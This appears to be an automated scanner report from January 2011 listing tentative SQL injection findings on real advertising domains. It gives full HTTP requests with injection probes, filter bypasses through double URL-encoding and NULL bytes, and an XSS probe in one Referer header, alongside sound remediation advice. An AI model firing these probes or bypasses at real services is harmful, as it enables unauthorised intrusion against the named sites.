Vulnerability Reports for January 29, 2011, SQL Injection, XSS

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://4c28d6.r.axf8.net
Path:	/mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y'&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:17 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y''&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:18 GMT

gomez.b1(0,0);

Summary

Severity:	High
Confidence:	Tentative
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=avnFcitMPm5rTgUyMAViQGXRj2XFiSZdW6ruZckmWfWkP5fEKbBOxEM3WdZaBv6Zad9mGUIuyv1rZcFTKo1n96DqoQXtUGgHaRTCOLQwbc4P2UpKxK7yQZbRdZbHj87Sx6M98nZbEfBJrvK5KB3QBeM92UFObRbhTPS4GkoC4LFwoU09EquWu1mITmZcxMVUVxST36WvQxSqplHisUs1cxL07LlwMQDb3vZaPlDUp9Vx0QqxphU4s7eg3SZawUlLkDgYtuXHxp6lrZcnyIhwvKte1Iny31sJWJnhbjNRHBZdt84iTMXd0HTu6JEKkLlUyt0m0QafqP1fZdd5ASLG3xpIlyd0QlyqGPm67fJ3EfoZbrBinCj0SKwamAFUcUZakxQS8JZdwvBUECON4QWZbrfUdUrvWphbF5213TQOKyuUQBTEZbiXxsVFAiLq1QqZb3k2SdatZaPnbKE9KqIfTNYvUeFSpx27pe4ZaXBRsr9b13hGOm84Ls5HWHZd4Gd3qxZc17rVg5y6vCJtZdkonvlQ6ModIyoqkFNfpBsOFRC4aSCZcZbr8WbZcJLUTjgFkO8ns4yZb0QTDBjZbgrHRfQh0O1MK6QlIfGo25; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:16 GMT;
Content-Type: text/html
Location: http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Request 2

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aAnFciqO2cur2OqNvhrZbroT7rI4FbUGtyAUZbK7Wwpt3JAeZcprc0mvJVbE8royfFWxpH2XnUbkRQ1kDMoaYmCnYNEC8KE8HLgxSpBGZdVe7VHuG1rP3PG59clGpZce3hWxkjOcIyaAxdATQ7wvPTJGgmjAu7UQ34gxps6ZdvwqPoImurPwoLmyGJTwUE4W2yM0yo16w7Zdli8M9YU4OWDZdjt5FrZaIJkxZbVRSBsORAuJuhitYTAWyp2ATjdIFXJFyw5Xo6h9KQiMeur2PeS3PNYmUepMMXMvuRZcHGWNhBWYJdJ9Zbrs6eZcuOsqIpZcrXYHbc6UZde0vZdtlZcShS5gjxC3NukC6P7euZbUJJC4yE2pLJwCZaZcPUZbGY22ZbNvmBGCC3Yq3aKKqMuBgq6IjnXu4pLtBiTH4BEAllZbPSCZaAE3mPyUZb7c0u5QVbyi5thiFbyntlAhhfFit4gtHIjSdSJ9AZbgBwFPxWtSoI1aTRtYhTOD5VDiZbda3Txp2TswbM8UaZdF52sS7ZaP6va9eiHtiJeZcpJ94HVfMFtsCNjsQbHZdCrIXHGKk88RHn1pMPUrqi4nSShYIVj8hiH2JCnGQSV; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:17 GMT;
Content-Type: text/html
Location: http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4938104.54

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37394

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
7878586;";
this.swfParams = 'aid=232434380&cid=39972439&pid=55865628&src=1361549&rv=3&rid=39990226&modelYear=&oem=&offerType=&modelName=&modelYear=2011&oem=nissan&offerType=positivemathstack&modelName=rogue';
this.renderingId = "39990226";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsM
...[SNIP]...

Request 2

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33336

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/cm.quadbostonherald/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/cm.quadbostonherald/?1%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/cm.quadbostonherald/?1%2527%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 882
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('');

var fd_clk = 'http://adsfac.us/link.asp?cc=QAN007.310009.0&clk=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234940335%3B0-0%3B0%3B27622757%3B255-0/0%3B40265255/402830
...[SNIP]...

1.5. http://ads2.adbrite.com/v0/ad [zs parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ads2.adbrite.com
Path:	/v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1198099&zs=3732385f3930%00'&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html;charset=utf-8
Content-Length: 1000
Date: Sat, 29 Jan 2011 01:56:24 GMT
Connection: close

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /v0/ad?sid=1198099&zs=3732385f3930%00''&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: b=%3A%3Apogj; Domain=.adbrite.com; Expires=Sun, 29-Jan-2012 01:56:25 GMT; Path=/
Set-Cookie: geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; Domain=.adbrite.com; Expires=Sat, 05-Feb-2011 01:56:25 GMT; Path=/
Set-Cookie: vsd="0@1@4d4373c9@d3.zedo.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:25 GMT
Connection: close
Content-Length: 376

document.writeln("<script language=\"JavaScript\">");
document.writeln("var zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zflag_sz=
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/st.php%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php%2527%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 218
Keep-Alive: timeout=120, max=893
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php%27%27 was not found on this server.</
...[SNIP]...

1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adscgen/st.php/1%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
